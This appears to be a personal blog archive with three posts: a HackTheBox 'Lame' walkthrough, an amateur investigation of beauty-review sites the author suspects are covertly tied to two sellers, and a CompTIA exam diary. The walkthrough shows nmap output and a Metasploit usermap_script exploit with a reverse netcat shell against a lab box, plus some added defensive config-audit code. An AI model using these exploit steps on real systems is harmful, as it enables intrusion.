HackTheBox: Lame walkthrough

No, not “a lame walkthrough” but “the walkthrough of the box called Lame.” That came off wrong. Anyhow ….

Yes, hello.

There are several HTB Lame walkthroughs out there — I am documenting these steps so that I can have a reference for future enumerations. Aight, let’s do this.


Lame is a super beginner friendly box, in fact this is my first walkthrough and the first box I ever rooted on HTB.

Time required: 15 minutes if you know what you’re doing, 1 hour if you are going to fumble your way through all this like I did.
You will also need a HTB VIP subscription for this is a retired box, and an attackbox that has nmap and metasploit installed. I am using Kali myself.

Let’s do this.


We shall start off with a basic nmap sweep, output below.
I break it down:
-Pn: Treat all hosts as online — skip host discovery (recommended by HTB)
-A: aggressive. Presently this enables OS detection (-O), version scanning (-sV), script scanning (-sC) and traceroute (--traceroute).

kali@kali:~$ nmap -Pn -A
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-26 22:56 EST
Nmap scan report for
Host is up (0.22s latency).
Not shown: 996 filtered ports
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h39m03s, deviation: 3h32m12s, median: 9m00s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2021-01-26T23:05:52-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.79 seconds

Fancy, eh?
Two things you need to take away from this output:
– Anonymous FTP login allowed
– The Samba version is Samba smbd 3.0.20-Debian
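
Those two takeaways can be pulled out of the scan text mechanically, which helps when the same review has to be repeated across many hosts. The following is an added example, not part of the original walkthrough: it parses nmap's normal output, lists services with an exact version for patch tracking, and flags script results; `SCRIPT_RULES`, the function names and the sample text are assumptions made for the example.

```python
import re

# Constructed sample: a few lines in the format of the scan output above.
SAMPLE_SCAN = """\
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Host script results:
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")
SCRIPT_RE = re.compile(r"^\|[_ ]?\s*([\w-]+):\s*(.*)$")
VERSION_RE = re.compile(r"^(.+?)\s+(\d+(?:\.\d+)+\S*)")

# Hypothetical rule set: script key -> (text that marks a finding, label).
SCRIPT_RULES = {
    "ftp-anon": ("Anonymous FTP login allowed", "anonymous FTP enabled"),
    "message_signing": ("disabled", "SMB message signing disabled"),
}

def parse_scan(text):
    """Return (services, findings) from nmap's normal text output."""
    services, findings, port = [], [], None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port = int(m.group(1))
            services.append((port, m.group(3), m.group(4).strip()))
        elif line.startswith("Host script results"):
            port = None  # host-level scripts are not tied to one port
        else:
            m = SCRIPT_RE.match(line)
            if m and m.group(1) in SCRIPT_RULES:
                needle, label = SCRIPT_RULES[m.group(1)]
                if needle in m.group(2):
                    findings.append((port, label))
    return services, findings

def pinned_versions(services):
    """Keep banners with an exact version; ranges like '3.X - 4.X' are dropped."""
    out = []
    for port, _name, banner in services:
        m = VERSION_RE.match(banner)
        if m:
            out.append((port, m.group(1), m.group(2)))
    return out

if __name__ == "__main__":
    svc, found = parse_scan(SAMPLE_SCAN)
    print(pinned_versions(svc))
    print(found)
```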


A little detour: I ftp’d into the box as anonymous user. I poked around but I didn’t find anything so eventually I switched up my strategy. At this point I was getting quite frustrated so I did some googling and stumbled upon a hint eventually. Fast forward 30 minutes…

I googled “Samba 3.0.20 Debian” and lo and behold, the first hit is our friends over at Rapid7 describing an exploit. Would you look at that. So I fire up metasploit, and searched for “samba”. Well, who would’ve thought there was an exploit:

msf5 exploit(linux/snmp/awind_snmp_exec) > search samba/usermap_script

Matching Modules

   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution

msf5 exploit(linux/snmp/awind_snmp_exec) > use 0
[*] Using configured payload cmd/unix/reverse_netcat
msf5 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   139              yes       The target port (TCP)

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST      yes       The listen address (an interface may be specified)
   LPORT  4443             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf5 exploit(multi/samba/usermap_script) > set RHOSTS
msf5 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP handler on 
[*] Command shell session 6 opened ( -> at 2021-01-27 00:05:46 -0500

Tah-dah! We have a shell. The rest was a walk in the park:

msf5 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP handler on 
[*] Command shell session 7 opened ( -> at 2021-01-27 00:06:51 -0500

find / -name user.txt
cat /home/makis/user.txt
<the user flag>

find / -name root.txt
cat /root/root.txt
<the root flag>

And that’s how you root Lame on HackTheBox.
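
Seen from the defending side, the module name points at Samba's `username map script` parameter, so the check on a host like this one is whether smb.conf sets it. An added example, not from the original post or the Samba project: a small smb.conf audit that also reports the signing setting nmap complained about; the sample config and its script path are constructed placeholders.

```python
import re

# Constructed sample config; the script path is a placeholder, not from the box.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   ; guest account = nobody
   Username  Map Script = /usr/local/bin/mapusers.sh
   server signing = auto
[tmp]
   path = /tmp
"""

def normalize(name):
    # smb.conf ignores case and whitespace in parameter names.
    return re.sub(r"\s+", "", name).lower()

def parse_smb_conf(text):
    """Return {section: {normalized_param: value}} for an smb.conf body."""
    sections, current, pending = {}, None, ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        pending = ""
        if line.endswith("\\"):            # value continues on the next line
            pending = line[:-1]
            continue
        if not line or line[0] in "#;":    # blank line or comment
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][normalize(key)] = value.strip()
    return sections

def audit_smb_conf(text):
    """List the [global] settings a reviewer should look at first."""
    glob = parse_smb_conf(text).get("global", {})
    issues = []
    script = glob.get("usernamemapscript")
    if script:
        issues.append(f"username map script is set: {script}")
    if glob.get("serversigning", "").lower() != "mandatory":
        issues.append("server signing is not mandatory")
    return issues

if __name__ == "__main__":
    for issue in audit_smb_conf(SAMPLE_SMB_CONF):
        print(issue)
```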

Bis bald,

Tanceuticals and Skin Drop

This is a brain-dump of what I believe is an online scam of three review sites. But maybe it’s perfectly legal. I don’t know, you tell me. I am just going to write down my findings.

Hi guys,

I stumbled upon a set of review sites that provide scammy “reviews” and steer potential buyers to specific products. I don’t know if this is legal, certainly not ethical, but I also don’t know where to go from here. So, for now, I decided to write a blog post about it.

This one is going to be really long. I am sorry in advance. There is a tl;dr at the end if you want to skip the fluff.

Backstory – the first review site

One day, when I searched for a self-tanner, I stumbled upon a website called SelfTanning.com. A self-tanner is a lotion or mousse that you can wipe on your skin and it makes you look tan for 5-7 days. There are no known side effects, it’s considered safe, and a lot of people do it. The only downside is, some self-tanners smell “ok”, some make you look orange instead of tan, some dry patchy or stain all your clothes. It’s a big market out there, and it’s easy to get lost in it.

Selftanning.com is run by a nice blonde lady who posts Youtube videos of her reviewing all the self-tanners out there. Exactly what I needed. She considers price, smell, color, how long each application lasts and she even had a page for the top 10 tanners for 2018, then she rates them on a scale of 5. Her top recommendation, Tanceuticals Extra Dark, was available on Amazon. I checked the reviews and bought a bottle for myself.

It worked great! The smell was great, the color was uncannily real, and it lasted for a good 7 days. I was pleased. I used up that bottle and ordered another one. Then, once I used up that one too, I ordered a third one.

The third bottle was runny, watery, and I sent it back to Amazon. I got a refund and ordered another brand that Amazon recommended for me. It wasn’t as good as Tanceuticals, but it was fine, and I’ve been using it ever since.

Three years later

It’s 2020, and I am in search of a good face cream that contains retinol. Without going into too much detail, retinol can be purchased with a prescription, and there are also OTC versions available. It’s one of the few ingredients that are proven to be efficient in keeping your skin in good shape if you continuously use it for years. There are a lot of products out there, and some are better than others. Some are completely useless. It’s a big market out there, and it’s easy to get lost in it.

I google “creams with retinol,” click on the top result: Retinol.com, and immediately get a strange feeling.

Retinol.com and Selftanning.com are the same review sites

But they are not the same. The sites’ structure is the same. They both have hundreds of video reviews, but the reviews are posted by different women. Products are reviewed the same way: price, how well it works, texture and feel. Both have a submenu for the top 10 products for the year.

I watched a few of the videos and they sound … legit. The woman’s tone doesn’t sound scripted, and she makes sense in the details she mentions. But then I notice the dates the videos were published: every 1-7 days.

Now, in case of self-tanning lotions I can see how 7 days are enough to test a product. But with facial creams, you need a good 30-90 days for each test. So these videos are fake. Or are they? She sounds honest and knowledgeable.

Who is sponsoring these sites?

I compared the “top” products on the two review sites and immediately saw an overlap. Three companies’ products received the highest ratings: Tanceuticals, Skinceuticals, and Skin Drop.

Skin Drop’s self tanner on Selftanning.com
Skin Drop’s retinol cream on Retinol.com

I searched for “Skin Drop” and “Skinceuticals”, and found a third website: Cellulite.com. Another website with the same structure, and same type of reviews by yet another woman. But this time I also noticed something else: the backdrop in some of the videos of Retinol.com and Cellulite.com was the same. I also noticed that over time they rotated some of the “review experts” and hired new ones.

Here are the playlists of each of the review sites on Youtube. They have uploaded hundreds of videos since mid-2015:

They don’t trash other products, but I also don’t believe these are honest reviews. In case of Cellulite creams (which are a complete scam, by the way, Cellulite creams don’t work), you would need to use them for weeks before you see results. And the thing with retinol is, it can be highly irritating to the skin. I am hesitant to even try one, let alone a hundred. What I am trying to say is, these women are very likely not talking about their own experiences, but they make it seem like they are.

About Us

Each of the review sites has an “About” page that contains a picture of one (or more) women who are the Chief Editors and reviewers. Selftanning.com is run by a group of women. I googled each of the names, but couldn’t find any of the matching name + face combinations.

Selftanning.com’s team
Cellulite.com’s host

Retinol.com is allegedly run by a Jessica Jones. I did not even bother to attempt to google that name, I knew the results would be saturated with images from the Marvel show. Cellulite.com is run by a woman whose name is Elizabeth Adams. I did try to google her .. couldn’t find anything.

Contact Us

Each site has a “Contact Us” page as well. They recommend that you write them via email, but they also list a mailing address.

Retinol.com’s mailing address
Selftanning.com’s mailing address
Cellulite.com’s mailing address

These addresses look fairly alike, no? Turns out, they are various UPS stores around the greater Phoenix area. I also tried to look at the ICANN’s registrar to find out who these addresses belong to. They are all registered to and live on godaddy.com’s servers and no other names were provided.

Skin Drop and Tanceuticals

The two companies’ websites look entirely similar, clearly they were built on the same framework. But I also discovered something else on skindrop.com: The Terms of Use page refers to Skin Drop as part of Tanceuticals. In addition, per the “Contact Us” page, both Skin Drop and Tanceuticals are also located in the Greater Phoenix Area. Their addresses are UPS boxes, just like the three review sites’.

Skin Drop’s Terms and Conditions

I pinged all five URLs. Tanceuticals.com and Skindrop.com came back from the same IP.

ping tanceuticals.com -c 1
PING tanceuticals.com ( 56 data bytes
64 bytes from icmp_seq=0 ttl=55 time=139.663 ms

ping skindrop.com -c 1
PING skindrop.com ( 56 data bytes
64 bytes from icmp_seq=0 ttl=55 time=71.291 ms


  • Selftanning.com, Retinol.com, and Cellulite.com are three sites offering seemingly independent product reviews.
  • The sites’ reviews are detailed, but posted all too often to believe that the reviews are based on real-life experiences.
  • The women posting these reviews seem to be local to the site. Their names (associated with this market) don’t appear anywhere else. In some cases in the past they occasionally switched the reviewers to new women.
  • The three sites’ top recommendations are products from two companies: Tanceuticals and Skin Drop.
  • Tanceuticals and Skin Drop are affiliated with each other.
  • Nowhere on Selftanning.com, Retinol.com, and Cellulite.com is it mentioned that they are affiliated with Tanceuticals or Skin Drop.
  • Selftanning.com, Retinol.com, and Cellulite.com, Skin Drop, and Tanceuticals’ physical addresses are UPS boxes around the Greater Phoenix Area.
  • All five URLs are registered and hosted on Godaddy.com. Tanceuticals.com and Skindrop.com are on the same server.

In my opinion, at the very least the reviews are dishonest and the top products are purposefully listed to steer potential buyers to two particular sites (which are also affiliated, so, same company). This by itself is not against the law, I believe. But this whole thing feels scammy to me. Maybe some of you can offer some insight.

Zero to OSCP Chapter 1 – CompTIA S+ and N+

Hi guys,

One year ago I decided to switch careers and get into cybersecurity. Don’t get me wrong, I love my DBA career. But maybe I would love cybersecurity even more, who knows?

Therefore, today I am going to start a new series on my blog, describing my path from zero to OSCP.

This is chapter one.

If you hate fluff, skip to the conclusions at the end of this post.

Background: I am a fantastic DBA. I love working with SQL Server, and as a result of my new position at CoverMyMeds, I am also becoming quite proficient in Postgres. However, I am one of those “Accidental DBAs” and I never completed a formal CS education.

Therefore, I recognized that I have gaps in my knowledge that I must fill sooner or later, and I decided to use the CompTIA exams for that: A+, N+, and S+.


In case you are a complete newbie to the topic, here is a link to CompTIA’s A+ page, but this is their beginner certification and covers basic computer technician concepts: how do internal parts work, how does the BIOS work, how to service a laptop and a computer. I had a good understanding of 70% of the concepts and I didn’t feel the need to sit for this exam. However, I also wanted to get a refresher, so I signed up to Cybrary.it (it’s free) and watched Anthony Harris’s A+ course. Unfortunately since then the course was retired, but Cybrary offers other, updated A+ courses instead.


I purchased Jason Dion’s N+ course on Udemy as well as the six practice exams, bought the CompTIA voucher and signed up for an exam one month out. I then promptly forgot about the whole thing for about 27 days until I got the reminder email. I rescheduled for another month. A month later I got another reminder email, and rescheduled again. And again. Finally I got tired of procrastinating and decided to just go for it.

Two weeks before the exam I started to watch the course on Udemy. The weekend before the exam I finished the course and moved on to the sample tests and promptly failed all of them. However, I noticed that quite a few people on Reddit also mentioned that they passed the exam and never got a passing score on the practice tests. 

Monday morning I successfully passed the test with a fairly low score. But hey, a pass is a pass ;)

For the record, here are my practice test results: 68%, 77%, 80%, 68%.


I did not learn from my previous mistakes, and after scheduling the S+ exam I, again, forgot about it until about a week before the exam. However, this time the universe decided to play a sick joke on me and there were no dates left for two months out in my area! So, I had no choice but to study for the exam with just 6 days left. I passed.

I used Jason Dion’s course and practice exams again. I speed-watched the entire course in four days, and each day I took another test to measure my progress. My baseline (pre-course) test was 60%. The practice test results were 62%, 67%, 72%, 78%. A lot of the concepts associated with this course were extremely familiar to me due to the cybersec podcasts I would listen to. For example, I scored 100% on most practice tests in the “Threat, Attacks, Vulnerabilities” module.

The day of the exam I was super unsure if I would pass. I was sweating hard by the end of the exam and barely passed – but a pass is a pass ;)

My personal understanding of CompTIA tests

They are not hard (so far). They are multiple choice questions and they are entirely theoretical. I don’t think they add much value to my career other than a nice little badge on LinkedIn. BUT! They are well-structured and help you organize your study material.

If your goal is to get valid work experience, don’t use the CompTIA exams. 

If your goal is to fill gaps in your knowledge, I would suggest them. If you have a couple hundred dollars to spare, or your employer pays for your continuous education, use them.


  • If you have a basic understanding of IT concepts, you can skip A+.
  • If you like to use online courses for studying, I recommend Jason Dion’s N+ and S+ online courses on Udemy.
  • I also recommend purchasing the practice tests. Some of the questions were verbatim the same.
  • There is always a sale going on on Udemy. Never spend more than $10-12 on a course or practice tests.
  •  I was able to pass these tests without using anything else. Jason Dion’s courses and practice tests together are enough.
  • If you get 70% on the practice exams, you are ready for the real ones. People who pass the real exam don’t always get 85% (passing score) on the test exams.
  • Skip the PBQs on the exam. Flag them, then move on to the multiple choice questions, and once you’re done with those you can read and solve the PBQs.
  • Flag everything that you are unsure of. After my first round, I flagged about 50% of the questions. Then I went back and reviewed everything I flagged and answered what I could. Sometimes later questions might jog your memory. 
  • Cybrary.it has exam vouchers with 10% off